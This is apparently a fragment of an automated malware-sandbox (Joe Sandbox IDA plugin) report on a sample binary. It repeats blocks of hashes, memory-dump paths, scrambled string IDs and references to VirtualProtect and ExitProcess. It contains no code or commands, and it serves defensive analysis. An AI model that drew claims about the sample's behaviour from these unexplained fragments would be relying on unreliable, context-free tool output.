                                                                                                                                                      • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-3058551535
                                                                                                                                                      • Opcode ID: 50bd9d5ab837e02da883fdefca2b0946b567497e94e9fb5ec3c5763d0cae3670
                                                                                                                                                      • Instruction ID: b89b7103d0fa27695ef78c0a4bb348488d698b876d94e036660cb1bab365a026
                                                                                                                                                      • Opcode Fuzzy Hash: 50bd9d5ab837e02da883fdefca2b0946b567497e94e9fb5ec3c5763d0cae3670
                                                                                                                                                      • Instruction Fuzzy Hash: 4FE126A2D082A49AF7218624DC447EB7B79DF91310F1481FAD54D6A281D27E0FC6CB67
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-3058551535
                                                                                                                                                      • Opcode ID: 23ef9a7b39ce9d328e365ae41671bb2b66ede6d6743c8988016826178aa77dee
                                                                                                                                                      • Instruction ID: 366b05091882c9197e83a7fdb40bb8b0b69c0581f31768dc85c13bca754d95be
                                                                                                                                                      • Opcode Fuzzy Hash: 23ef9a7b39ce9d328e365ae41671bb2b66ede6d6743c8988016826178aa77dee
                                                                                                                                                      • Instruction Fuzzy Hash: 77E136A2D082A49BF7218624DC447EB7B79EF91310F1481FAD54D67281D27E0FC6CB66
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-3058551535
                                                                                                                                                      • Opcode ID: 0ad95aec03d049a785a27f8ab78db8fc1a74cc6957920696c18b6f03b6a14bf5
                                                                                                                                                      • Instruction ID: c6b4abe6201f42a9dc069e46274cd9b3491ae5b1b96948f19b1286337f56ceaf
                                                                                                                                                      • Opcode Fuzzy Hash: 0ad95aec03d049a785a27f8ab78db8fc1a74cc6957920696c18b6f03b6a14bf5
                                                                                                                                                      • Instruction Fuzzy Hash: 80E146A2D082A49AF7218624DC44BEB7B79DF91310F1481FED44D6A281D27E0FC6CB67
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-3058551535
                                                                                                                                                      • Opcode ID: 2b65a9afca3fe0157da0e974b2c5d5dd3769f05387e5c7f4a3326f01f4ef5363
                                                                                                                                                      • Instruction ID: ed8e06320c1ad1f63d05f356348c29088993c0ffd5424871ee90d4ef865e1f34
                                                                                                                                                      • Opcode Fuzzy Hash: 2b65a9afca3fe0157da0e974b2c5d5dd3769f05387e5c7f4a3326f01f4ef5363
                                                                                                                                                      • Instruction Fuzzy Hash: 58D145A2D082A49AF7218624DC44BEB7B79EF91310F1481FED54D66281D27E0FC6CB67
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-3058551535
                                                                                                                                                      • Opcode ID: dbc8291b70dba38dcb1408b8221c043063f75e451019f64f739a7bf78c75daa9
                                                                                                                                                      • Instruction ID: d7a296b10f212e9af49ab3c416a3833ced58286689dd1539334ceac151fafce4
                                                                                                                                                      • Opcode Fuzzy Hash: dbc8291b70dba38dcb1408b8221c043063f75e451019f64f739a7bf78c75daa9
                                                                                                                                                      • Instruction Fuzzy Hash: A2D146A2D082949AF7218624DC44BEB7B79EF91310F1481FED54D6A281D27E0FC6CB67
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-3058551535
                                                                                                                                                      • Opcode ID: 8b70c4aa26d7f2bcf99f32be88e0d80cc6d8ce75deedde87f3668fcd8c2d88b0
                                                                                                                                                      • Instruction ID: 2ef544b212997e4fa31eec0942fd3b924e6969ce177f6a5f87ea744a3f2af44a
                                                                                                                                                      • Opcode Fuzzy Hash: 8b70c4aa26d7f2bcf99f32be88e0d80cc6d8ce75deedde87f3668fcd8c2d88b0
                                                                                                                                                      • Instruction Fuzzy Hash: DFD146A2D082A49AF7218624DC44BEB7B79EF91310F1481FED54D66281D27E0FC6CB66
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-3058551535
                                                                                                                                                      • Opcode ID: 2b7f984ab290ffcdb417485266c060ca2e2ab393ee018a43cc7025f2ff97e756
                                                                                                                                                      • Instruction ID: 4790f4736528595fe89bac11a1248bc76c36d27961205c98a63ae5969e88619c
                                                                                                                                                      • Opcode Fuzzy Hash: 2b7f984ab290ffcdb417485266c060ca2e2ab393ee018a43cc7025f2ff97e756
                                                                                                                                                      • Instruction Fuzzy Hash: D4D145A2D082A49AF7218624DC44BEB7B79EF91310F1481FED54D66281D27E0FC6CB66
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-3058551535
                                                                                                                                                      • Opcode ID: f01a4d86a7659898a418b6ab5ea87539e07283f0ac0f1837e998bda6eca18859
                                                                                                                                                      • Instruction ID: 90faed7bee1ee36d03feeb63130216d79dd2597e9304a2bcdf97559ea1b09dd1
                                                                                                                                                      • Opcode Fuzzy Hash: f01a4d86a7659898a418b6ab5ea87539e07283f0ac0f1837e998bda6eca18859
                                                                                                                                                      • Instruction Fuzzy Hash: D8D146A2D082A49AF7218724DC44BEB7B79EF91310F1481FED54D66281D27E0FC6CB66
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-3058551535
                                                                                                                                                      • Opcode ID: abfe6fc19b72547787baa3c208adc5c17f130ab77c041f8ed1808c17cab47394
                                                                                                                                                      • Instruction ID: 0371a4b27facc6ada17a49e1f9b6af079a9a001b71fe6c1c6e946b71b6c7c027
                                                                                                                                                      • Opcode Fuzzy Hash: abfe6fc19b72547787baa3c208adc5c17f130ab77c041f8ed1808c17cab47394
                                                                                                                                                      • Instruction Fuzzy Hash: 1FD144A1D082949BF7218624DC85BEB7B79EF81310F0481FED44D6A281D27E4FC6CB66
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-3058551535
                                                                                                                                                      • Opcode ID: 34c39d1fb9014bbdb12798611917349d0329a1e4ff49ee0fab202022bbdc260a
                                                                                                                                                      • Instruction ID: 81a1e5a6bc3b10ed7a4da47fcac608d4515ba001ea5eca5989b0f0c4c62595f1
                                                                                                                                                      • Opcode Fuzzy Hash: 34c39d1fb9014bbdb12798611917349d0329a1e4ff49ee0fab202022bbdc260a
                                                                                                                                                      • Instruction Fuzzy Hash: 73D144A1D082A89BF7218624DC857EB7B79EF91310F1481FED44D66281D27E0FC68B67
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-3058551535
                                                                                                                                                      • Opcode ID: f6f8ba0d642129f051d542368fb8ee1f7e53a1533c60da5431eedd70ea8ad1e4
                                                                                                                                                      • Instruction ID: af87c79a6a843894e6144d3079a128d34d891af3e7149fc025cb9fe82e067a62
                                                                                                                                                      • Opcode Fuzzy Hash: f6f8ba0d642129f051d542368fb8ee1f7e53a1533c60da5431eedd70ea8ad1e4
                                                                                                                                                      • Instruction Fuzzy Hash: 46D145A1D082989BF7218624DC85BEB7B79EF91310F1481FAD44D66281D27E0FC6CB66
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-3058551535
                                                                                                                                                      • Opcode ID: 2c56d24630f2530f2035040eecaa7ad1d832a73cf11b818619f49581e0e0aa52
                                                                                                                                                      • Instruction ID: e2c6151aa9e1a55468fcc572f6645a23d0efd6f80fbeabc255d88c0749e44b9c
                                                                                                                                                      • Opcode Fuzzy Hash: 2c56d24630f2530f2035040eecaa7ad1d832a73cf11b818619f49581e0e0aa52
                                                                                                                                                      • Instruction Fuzzy Hash: 5ED164A2D082949BF7218624DC85BEB7B79EF91300F1481FED44D66281D27E0FC68B67
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-3058551535
                                                                                                                                                      • Opcode ID: d27d8dbd0c9865dc8d0986c517809e804b1766a9ec7c3e715070419703f59d93
                                                                                                                                                      • Instruction ID: ec2c7275a11da5b48301671a939b02e52abdf974147d9040d07dd93b18dc885f
                                                                                                                                                      • Opcode Fuzzy Hash: d27d8dbd0c9865dc8d0986c517809e804b1766a9ec7c3e715070419703f59d93
                                                                                                                                                      • Instruction Fuzzy Hash: 1BC134A1D082949AF7218624DC85BEB7A79EF91310F1481FED44D66281D27E0FC68B67
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-3058551535
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-3058551535
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-3058551535
                                                                                                                                                      APIs
                                                                                                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 0040B9F3
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ProtectVirtual
                                                                                                                                                      • String ID: 4?AM$E$L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 544645111-3058551535
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: L$L$P$W$[W$a$a$b$c$d$e$i$i$o$o$r$r$r$s$s$t$x$y
                                                                                                                                                      • API String ID: 0-3789451
                                                                                                                                                      • Opcode ID: 728d33ce5cd8392fae6969d104fd9af6f9ef25b71e3e986a57db29dd23adc8fa
                                                                                                                                                      • Instruction ID: 874e2093608d45835aede55c8446f2b5f904800d1c55310015db4c22bb41d1fc
                                                                                                                                                      • Opcode Fuzzy Hash: 728d33ce5cd8392fae6969d104fd9af6f9ef25b71e3e986a57db29dd23adc8fa
                                                                                                                                                      • Instruction Fuzzy Hash: 63B176A2D082949AF7218624DC457EB7A79EF91310F1480FED44D2B681D2BE0FC6CB67
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      • Associated: 00000000.00000002.2403062501.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.2403157155.0000000000427000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.2403186216.0000000000430000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.2403211249.0000000000431000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.2403249758.0000000000434000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.2403276732.000000000043A000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.2403301333.0000000000441000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.2403333264.0000000000454000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.2403361326.0000000000458000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.2403413640.00000000004AD000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.2403435137.00000000004AF000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.2403456156.00000000004B6000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.2403479287.00000000004BD000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.2403571607.00000000005BC000.00000080.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.00000000005FB000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      • Associated: 00000000.00000002.2403606281.000000000062A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                                                                                                                                      • API String ID: 0-4069139063
                                                                                                                                                      • Opcode ID: 9df7d5d23bbc09a76e55fc722713846a0b7298c9866ff876747dccc9071441c2
                                                                                                                                                      • Instruction ID: 122b3ec247b77071abeb3fe2ad62212ee0e4536a4f113f9908a4b273c503602e
                                                                                                                                                      • Opcode Fuzzy Hash: 9df7d5d23bbc09a76e55fc722713846a0b7298c9866ff876747dccc9071441c2
                                                                                                                                                      • Instruction Fuzzy Hash: 949153A2D082949BF7218624DC457EB7A39EFD1310F1481FED84D6A681D27E0FC68B67
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                                                                                                                                      • API String ID: 0-4069139063
                                                                                                                                                      • Opcode ID: 611d0005cabf44f96822be3f0a8812cbaa8a3fd56c920439c72d0e02ee5dcf49
                                                                                                                                                      • Instruction ID: 03bbd1a9fcc01feb49f49906e2d0f8e8fd5ee5de2a67679feec8f5ef71f9b084
                                                                                                                                                      • Opcode Fuzzy Hash: 611d0005cabf44f96822be3f0a8812cbaa8a3fd56c920439c72d0e02ee5dcf49
                                                                                                                                                      • Instruction Fuzzy Hash: 057113A1D082549AF7218724DC85BEB7A39EF90710F1481FEE44D66681D67E0FC6CB2B
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                                                                                                                                      • API String ID: 0-4069139063
                                                                                                                                                      • Opcode ID: f76258e3d6a9618a04de03aee0d9a9e170243ee4795f5539bebb1bff34a34aa5
                                                                                                                                                      • Instruction ID: 1ba5fe4495c7287c7b9ef3fb20152038ef40ca83fee558dec99f9d06b972943c
                                                                                                                                                      • Opcode Fuzzy Hash: f76258e3d6a9618a04de03aee0d9a9e170243ee4795f5539bebb1bff34a34aa5
                                                                                                                                                      • Instruction Fuzzy Hash: 2A7103A2D082549AF7218724DC45BEB7A39DFD0710F1481FED44D66681E6BE0FC68B2B
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                                                                                                                                      • API String ID: 0-4069139063
                                                                                                                                                      • Opcode ID: e7b9b8927a1f308dcd6adc6b7bae82f96a8f9014b9efb6e6694a513b61e6bd0a
                                                                                                                                                      • Instruction ID: 05d83e1bdd861b36c7118d7b3db9dfa3e57a712bef10cd6f58d093f64900b8b7
                                                                                                                                                      • Opcode Fuzzy Hash: e7b9b8927a1f308dcd6adc6b7bae82f96a8f9014b9efb6e6694a513b61e6bd0a
                                                                                                                                                      • Instruction Fuzzy Hash: C46103A1D08254DAF7218724DC457EB7A39DFD0710F2481FED44D6A681E6BE0BC68B2B
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                                                                                                                                      • API String ID: 0-4069139063
                                                                                                                                                      • Opcode ID: 550748123659a34964c3edfdc6818248ee6223c2fc985f01e5edfecb57c9d602
                                                                                                                                                      • Instruction ID: 208619864822ded23b9f0fc6e8d017ad9afea93b209a8c31258b565a3838358e
                                                                                                                                                      • Opcode Fuzzy Hash: 550748123659a34964c3edfdc6818248ee6223c2fc985f01e5edfecb57c9d602
                                                                                                                                                      • Instruction Fuzzy Hash: 246133A1D08294DAF7218724DC457EB7A39DFD0710F1481FED44D66681D6BE0BC68B27
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                                                                                                                                      • API String ID: 0-4069139063
                                                                                                                                                      • Opcode ID: 9ddb5a7f7316180acbc25141c48f4b95fb4f7d769d39293a7c0d0e919ba87399
                                                                                                                                                      • Instruction ID: fd5885023f4b358d4eac04baf7284476dbc9d60256054ac93b075ccfc545bb63
                                                                                                                                                      • Opcode Fuzzy Hash: 9ddb5a7f7316180acbc25141c48f4b95fb4f7d769d39293a7c0d0e919ba87399
                                                                                                                                                      • Instruction Fuzzy Hash: D7611491D08294DAF7218724DC457EB7A39DFD0710F1481FED44D6A681D6BE0BC68B27
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID:
                                                                                                                                                      • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                                                                                                                                      • API String ID: 0-4069139063
                                                                                                                                                      • Opcode ID: cf732239f50026ec166b5f8a304eb691d086f306dfed2806414a5b96e8da4638
                                                                                                                                                      • Instruction ID: b91351a602d593e604c9a597045b4f32dd95b2873b3e86a3e59e99e712c295bb
                                                                                                                                                      • Opcode Fuzzy Hash: cf732239f50026ec166b5f8a304eb691d086f306dfed2806414a5b96e8da4638
                                                                                                                                                      • Instruction Fuzzy Hash: C76103A1D08294DAF7218724DC457EB7A39DFD0710F1481FED44D6A681E6BE0BC68B27
                                                                                                                                                      APIs
                                                                                                                                                      • ExitProcess.KERNEL32(00000000,0040FCC1,0040FB1E,?,?,00432A9C), ref: 0040D7BE
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000000.00000002.2403093596.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_4JwhvqLe8n.jbxd
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ExitProcess
                                                                                                                                                      • String ID:
